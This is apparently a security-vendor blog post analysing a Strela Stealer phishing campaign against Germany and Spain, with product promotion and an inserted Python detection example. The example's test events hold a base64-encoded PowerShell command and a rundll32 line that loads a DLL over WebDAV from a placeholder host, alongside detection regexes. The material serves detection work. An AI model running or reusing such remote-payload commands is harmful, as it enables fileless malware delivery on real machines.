Stealthy Strela Stealer Detection: Info-Stealing Malware Resurfaces with Enhanced Capabilities to Target Central and Southwestern Europe
Security researchers have revealed a stealthy campaign targeting users in Central and Southwestern Europe with an email credential stealer. Dubbed Strela, this evasive malware is deployed via phishing emails, utilizing obfuscated JavaScript and WebDAV to circumvent conventional security measures. Since its emergence two years ago, Strela Stealer has significantly enhanced its malicious capabilities, allowing it to fly under the radar while covertly stealing sensitive data from unsuspecting users.
Detect Stealthy Strela Stealer Attacks
According to IBM, phishing remains a predominant infection vector in 2024, with over 40% of security incidents using it as the initial access point. To stay on top of emerging threats and proactively withstand potential intrusions, such as Strela Stealer attacks, security professionals can rely on SOC Prime Platform for collective cyber defense, which provides a complete product suite for advanced threat detection and hunting.
Addressing the latest Strela Stealer campaign, SOC Prime Platform offers a set of curated Sigma rules to identify associated malicious activity at the earliest stages. Hit the Explore Detections button below and immediately drill down to relevant detection rules provided by the SOC Prime Team and our experienced Threat Bounty developer Davut Selcuk.
All detections are accompanied by extensive threat intelligence, attack timelines, and additional metadata. Moreover, all the rules are compatible with 30+ SIEM, EDR, XDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework.
Eager to contribute to collective cyber defense? Aspiring security professionals can sharpen their detection engineering & threat hunting skills by joining the crowdsourced Threat Bounty Program. Advance your career while enriching collective industry expertise and earning financial rewards for your input.
Strela Stealer Analysis
Cyble Research and Intelligence Labs have unveiled a covert phishing campaign primarily targeting Germany and Spain, which leverages obfuscated JavaScript and WebDAV to deliver a payload and steal sensitive user data. The final payload is a new, more advanced variant of Strela Stealer that bypasses security measures via obfuscated JavaScript and PowerShell commands. Apart from credential theft, Strela Stealer collects extensive system information, allowing attackers to perform reconnaissance and possibly initiate additional targeted activities on the compromised systems.
Strela Stealer, which has been active in the cyber threat arena since at least late 2022, is an infostealer specifically crafted to extract email account credentials from popular email clients. In their recent campaign, adversaries have evolved their tactics by employing spear-phishing emails containing ZIP files that house obfuscated JavaScript code designed to run via WScript. The infection chain starts with a fraudulent invoice notification for a recent transaction accompanied by a ZIP attachment containing a weaponized JavaScript file that leverages sophisticated obfuscation techniques. The JavaScript file runs a base64-encoded PowerShell command, which retrieves the final malicious DLL from a WebDAV server via rundll32.exe, a Microsoft-signed utility frequently weaponized by attackers. Because the DLL is loaded directly from the WebDAV share, it is never saved to disk, which enables it to bypass security defenses. The infostealer continues execution if a check through the GetKeyboardLayout API detects a matching keyboard layout, which points to Germany and Spain as the specific malware targets.
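To make the chain above concrete from the detection side, here is an added Python example (not the page's code and not SOC Prime's Sigma rules) that runs two heuristics over constructed Sysmon-style process-creation events: a script host spawning PowerShell with an encoded command, and rundll32.exe pointed at a WebDAV UNC path, whether that path appears directly or inside the decoded PowerShell. The event fields, file paths and the 203.0.113.10 address are assumptions.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (TEST-NET address, not real telemetry).
_ENC_PS = r"rundll32.exe \\203.0.113.10@8080\DavWWWRoot\invoice.dll,Entry"
_B64 = base64.b64encode(_ENC_PS.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -enc " + _B64},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\203.0.113.10@8080\DavWWWRoot\invoice.dll,Entry"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # benign admin script
     "CommandLine": r"powershell.exe -ep bypass -File C:\tools\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign
]

_ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# UNC path carrying a WebDAV marker: "@SSL" / "@port" host suffix or a DavWWWRoot share
_WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@(?:ssl|\d+)\\|\\davwwwroot\\)", re.I)

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def match_rules(event):
    """Names of the Strela-chain heuristics this single event satisfies."""
    parent, image, cmd = _basename(event["ParentImage"]), _basename(event["Image"]), event["CommandLine"]
    decoded = decode_encoded_command(cmd) if image == "powershell.exe" else None
    hits = []
    # Stage 1: WScript/CScript (the JS dropper's host) launching PowerShell with an encoded command
    if parent in ("wscript.exe", "cscript.exe") and decoded is not None:
        hits.append("script_host_spawns_encoded_powershell")
    # Stage 2: rundll32 handed a WebDAV UNC path, seen directly or inside the decoded PowerShell
    if (image == "rundll32.exe" and _WEBDAV_UNC.search(cmd)) or (
            decoded and "rundll32" in decoded.lower() and _WEBDAV_UNC.search(decoded)):
        hits.append("rundll32_loads_dll_over_webdav")
    return hits
def scan(events):
    return {i: r for i, e in enumerate(events) if (r := match_rules(e))}
```

The two benign events (an administrator running a local script, and a local DLL invoked via rundll32) produce no hits, which is the false-positive check a practitioner would want before shipping such logic.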
Potential mitigation measures to minimize the risk of Strela Stealer infections involve enforcing strict access controls on WebDAV servers and restricting the execution of PowerShell and other scripts on endpoints that do not require them for business operations.
As threat actors adopt more advanced variants of information-stealing malware that rely on intricate obfuscation and detection evasion techniques, it is imperative for defenders to bolster proactive security measures. By relying on SOC Prime’s complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection, security teams can proactively thwart attacks of any sophistication while reinforcing the organization’s cybersecurity posture.